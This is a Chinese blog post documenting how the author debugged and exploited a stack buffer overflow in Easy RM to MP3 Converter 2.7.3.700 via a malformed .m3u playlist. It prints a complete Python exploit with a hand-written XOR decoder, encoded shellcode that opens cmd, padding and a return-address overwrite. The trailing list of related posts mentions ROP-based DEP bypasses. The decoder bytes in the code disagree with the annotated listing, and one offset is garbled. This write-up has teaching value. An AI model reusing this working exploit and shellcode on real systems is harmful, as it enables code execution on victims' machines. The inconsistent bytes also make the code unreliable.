Easy RM to MP3 Converter Version 2.7.3 700漏洞分析

最新推荐文章于 2021-03-18 22:55:14 发布
最新推荐文章于 2021-03-18 22:55:14 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daoyikong_x18/article/details/22853075
版权

软件链接:http://pan.baidu.com/s/1eQcLbpw

测试环境:xp sp3


看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。

 

运行程序,界面如图,下方为它的版本号。

 

 

该溢出漏洞是加载畸形过长的.m3u文件时发生溢出,这种溢出漏洞很普遍。先用python生成10000个’a’的.m3u文件,加载看看。

#py

 

f = open(r'C:\Documents and Settings\123\桌面\3.m3u','w',encoding='gbk')

 

s = 'a'*10000

 

f.write(s)

f.close

print('success!')

 

发现没有异常,接着用20000个’a’试试,依然正常,用30000个’a’试试,程序崩掉了,那就在20000到30000之间构造不同的数据以确定溢出点。

首先用OD加载程序,然后准备加载文件。

 

但在点‘打开’之前,要在ReadFile处设断点。

 

点‘打开’后程序断在如下图位置,

 

这里是链接库的领空,F8走走,走到程序领空,如下图。

 

Ctrl + F8走走,程序异常了,很明显被我们的数据给覆盖了返回地址,此时,按Esc

 

在最后出问题的指令前下断点。

 

 

经过一番尝试,找到了溢出点在26078~260871这四个字节。

 

此时esp为0x000ff728,输入数据的开始处为0x000f6e44

已将180字节的shellcode编码,再来构造解码器

\x8b\xc4              Mov eax,esp

\x66\x2d\xd6\x88       Sub ax,0x88d6

\x33\xd2              Xor edx,edx

\x8A\x1C\x10          mov bl,byte ptr ds:[eax+edx]         edx为0,用来计数

\x80\xF3\x95          xor bl, 0x95                      异或0x95

\x88\x1C\x10         mov byte ptr ds:[eax+edx],bl

\x42                inc edx

\x80\xFA\xB4        cmp dl,0Xb4                      解码180个字节后停止解码

\x75\xF1            jnz XX

 

Shellcode执行system(“cmd”)的功能。

用python写exploit

#py

f = open(r'C:\Documents and Settings\123\桌面\4.m3u','w',encoding='utf-8')

 

decoder ='\x8b\xc4\x66\x2d\xcd\x88\x33\xd2\x8A\x1C\x10\x80\xF3\x95\x88\x1C\x10\x42\x80\xFA\xB4\x75\x1F'

shellcode ='\x7e\xf2\xc0\x1e\x79\xf1\x34\xa5\x95\x95\x95\x1e\xd5\x99\x1e\xd5\x81\x1e\x95\x1e\xe5\xbd\x15\xeb\x99\xa6\xe0\x60\x1e\xd5\x85\x1e\x6d\x96\xea\xa9\x1e\xea\xed\x96\x6d\x1e\x4a\x1e\xee\xb5\x96\x6d\xa6\x5c\x1e\xa1\x1a\x96\x65\xd4\x1e\xc1\xb1\x9d\xac\x83\xe0\x67\x1e\xc1\xb1\x99\xac\xc3\x91\xe0\x7c\x1e\xee\xb1\x96\x6d\x1e\x99\xda\x14\x74\x6a\x6a\x95\x95\x1e\xee\x89\x96\x6d\xdc\x54\x74\x97\x1e\xa9\x9a\x96\x52\xc8\x57\x9d\x95\xfd\xe7\xfa\xf6\xd4\xfd\xd2\xf0\xe1\xc5\x7d\x1f\x6a\x6a\x6a\xc5\xfd\xd9\xfc\xf7\xe7\xfd\xd9\xfa\xf4\xf1\x7d\xef\x6a\x6a\x6a\xc5\xfd\xe7\xe1\x95\x95\xfd\xf8\xe6\xe3\xf6\xc1\x6a\x45\x16\x51\x9d\xfd\xf0\xf8\x95\x95\xfd\xe6\xec\xe6\xe1\xc1\xc5\x6a\xc1\xb1\x81\x16\x51\x9d\xfd\xf6\xf8\xf1\x95\xc1\x6a\x45'

junk = 'a'*25874

jmpesp ='\x44\x6e\x0f\00'

s = decoder + shellcode + junk + jmpesp

 

f.write(s)

f.close

print('success!')

溢出点已被00f6e43覆盖了


程序直接跳到了00f6e43处执行程序。

该部分就是解码器


以下部分就是编码后的shellcode


经过解码器的循环解码,shellcode终于露出了它的真面目。


执行该部分的指令,成功的打开了cmd!!


 

 


w4y2
关注
专栏目录
ecshop v2.7.3漏洞分析和修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-10 1216
ecshop v2.7.3漏洞修复,了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号 修改\admin\edit_languages.php // 修复前 $dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";'; // 修复后,由于想在单引号之间出现单引号,必须使用转义。 $dst_items[$i] = $_POST['item_id'][$i] .' = '. '\'
Easy RM to MP3 Converter 2.7.3.700
03-12
Easy RM to MP3 Converter 2.7.3.700
Easy RM to MP3 Converter漏洞分析报告
qq_32843153的博客
08-17 379
Easy RM to MP3 Converter漏洞分析报告   软件名称:PCManFTP 软件版本:2.0 漏洞模块:RM2MP3Converter.exe 模块版本:2.7.3.700 编译日期:2006-09-29 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:NULL 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:本
Easy RM to MP3 Converter(2.7.3.700)栈溢出漏洞调试笔记
weixin_33778544的博客
03-08 436
Debug_Orz · 2014/10/13 17:410x00 基础知识1 Windows环境选取wmplayer.exe程序运行时的内存布局示意,包括栈,堆,加载模块(DLLs)和可执行文件本身。Win32进程空间布局示意。1.2 入口点(Entrypoint)运行一个EXE的时候,会先根据IAT表加载相应的DLL,并且用GetProcAddress得到API的真实地址。也就是说EXE运行后,...
Easy RM to MP3 Converterv2.7.3(CVE-2009-1330)漏洞
06-20 504
软件名称:Easy RM to MP3 Converter 软件版本:2.7.3 漏洞模块:PM2MP3Converter.exe 操作系统:Windows 7\sp1\x86 漏洞编号:CVE-2009-1330 危害等级:中危 漏洞类型:缓冲区溢出 威胁类型:本地 1. 软件介绍 Easy RM to MP3 Converter为05-06年流行的支持常用音频格式文件MP3,...
经典栈溢出 Easy RM to MP3 Converter
钞sir的博客
10-24 4306
以一个样本(Easy RM to MP3 Converter)将作为经典栈溢出的讲解实例,首先说明此实验是WIN10环境下复现的; “Easy RM 2 MP3 Converter”是一个音频格式的转换工具,年代比较久远了。在2009年7月17日,packetstormsecurity公开了该软件的一个栈溢出漏洞并提供了exploit:https://packetstormsecurity.co...
Ecshop2.7.3[已打2.7.3漏洞补丁].ra
04-02
标题中的"2.7.3[已打2.7.3漏洞补丁]"表明这是Ecshop的2.7.3版本,且已经包含了对这个版本已知安全漏洞的修复。在网络安全日益重要的今天,打上补丁的软件是非常必要的,因为它可以保护网站免受恶意攻击,确保用户...
Weinview Easy Builder500 V2.7.3软件.zip
09-25
Weinview Easy Builder500 V2.7.3软件zip,Weinview Easy Builder500 V2.7.3软件
hadoop 2.7.3 32位
07-18
本文将详细探讨关于"Hadoop 2.7.3 32位"的相关知识点,这对于那些在32位系统上进行Hadoop学习和实践的用户来说尤其重要。 首先,Hadoop 2.7.3是Hadoop的一个稳定版本,它包含了多项改进和优化,比如YARN(Yet ...
VirtualProtect 2方法 -direct ret-dep-easy rm to mp3
weixin_30885111的博客
06-25 121
本次试验已经解决了 00字符的问题, 还有的问题在于用了很多的 系统DLL 试验在 XP SP3 下进行的~~~~ 例子软件:easy rm to mp3 2.7.3.700~~~~~~~~~~~~~~~~~~~~~~~ ROP链 = 很多歌ROP小配件 ROP小配件 =每个指令 + ret 怎么找 ROP小配件: 1 直接找一些指令+r...
Easy RM to MP3 Converter
08-24
Exploit编写系列教程1-10教程系列的参考软件,字数补丁补丁
适合中文版本的Easy RM to MP3 Converter rop 过depexploit
thesum的专栏
05-01 890
#------------------------------------------------------------ #ROP based exploit for Easy RM to MP3 Converter #written by corelanc0d3r - http://www.corelan.be #-------------------------------------
Easy RM to MP3 漏洞调试
xiaoeryu_的博客
03-18 335
0X00 前言 分析这个漏洞主要是为了学习怎么通过调试并编写溢出类型漏洞的EXP 0X01 分析环境 调试环境 版本 系统版本 XP_sp3 Easy RM to MP3 2.7.3.700 windbg 6.12 0X02 漏洞描述 这个漏洞是一个典型的溢出类型漏洞,在处理字符的时候没有对长度做限制,在读取到第25000~30000个字符的时候会导致返回地址被覆盖导致溢出 0X03 漏洞分析 编写perl脚本生成漏洞验证文件 my $file= "crash25000.m3u"
Easy RM to MP3 Converter栈溢出定位及漏洞利用
weixin_30374009的博客
08-19 283
  本文主要是Easy RM to MP3 Converter(MFC++编写)栈溢出的定位及windows下shellcode编写的一些心得。   用到的工具及漏洞程序下载地址https://github.com/5N1p3R0010/Easy-RM-to-MP3-Converter   首先,在填充字符为10000和20000时,异常被捕捉到 在填充字符为30000时,程序崩溃...
RM2MP3溢出漏洞报告【分析篇】
精彩的艺术
02-28 518
版本:2.7.3.7000 工具:OllyDbg1.1 环境:win7 sp1 x86 时间:2016.12.22 1.收集信息 •1.因为是读取文件时出现的问题,所以可能用到的API函数:CreateFileA/W •2.准备之前的利用漏洞的m3u文件 2.下断点 •下CreateFileA、Cr
【缓冲区溢出】EasyRMtoMP3Converter.exe stack overflow bypass dep using rop tech
Catch me if you can
04-25 1653
使用rop绕过dep,关键函数setProcessDEPPolicy。 测试报告。
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 947
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
Exploit Easy RM 2 MP3的学习笔记
weixin_42127015的博客
05-28 233
这篇文章,是我的学习笔记。很多人在学习二进制的漏洞挖掘的时候,都会觉得入门很难,甚至是看不下去,其实我到不是这样认为的,无论学习什么都是要抓住重点和原理,知识在于分享,有很多人觉得如果我会了,就不应该告诉别人,我不是这么认为,我在外国也经常会分享一些东西,大家都很感兴趣,有的时候就会把我拉入私人小组,我也认识很多喜欢分享的朋友比如红尘,大柱子等等。还有就是你要做这件事的目标是什么,你的目标如何...
高危漏洞分析:Web应用安全警报
"该文档列出了一系列的Web应用漏洞,包括各种类型的远程代码执行、SQL注入、文件包含和跨站脚本等安全问题,涉及到多个知名的Web应用系统如ADOBEColdFusion、BEESCMS、CmsEasy、DedeCMS、Discuz、Drupal和ECShop等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值